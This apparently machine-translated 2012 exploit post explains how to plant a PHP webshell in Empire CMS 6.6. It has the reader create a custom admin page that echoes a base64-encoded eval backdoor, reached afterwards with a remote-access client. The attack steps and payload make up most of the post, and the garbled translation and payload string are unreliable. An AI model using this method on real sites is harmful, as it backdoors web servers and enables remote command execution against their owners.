Empire cms the latest version of the background to get webshell method-vulnerability warning-the black bar safety net

2012-09-20T00:00:00
ID MYHACK58:62201234982
Type myhack58
Reporter 佚名
Modified 2012-09-20T00:00:00

Description

Don't know who did the hair too. Anyway yesterday I get a station of their own. Must share out it!!!!

Due to my day that Station is the Empire cms 6.6 the latest version, so the Internet to find some of the methods are failure!

Custom pages-added custom page-feel free to write a xxx. php file name, the content of the page to fill out,<script language="php">echo base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnxsk7pz4=");</script>

If the content is directly added word or php in Malaysia is useless, because he will generate a xxx. php prior to you performing it!!!!

PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnxsk7pz4= is <? php @eval($_POST['cmd']);?& gt; base64 encryption.

So the generated xxx. php will appear after the contents of the <? php @eval($_POST['cmd']);?& gt; in the file, and then use the chopper directly connected!!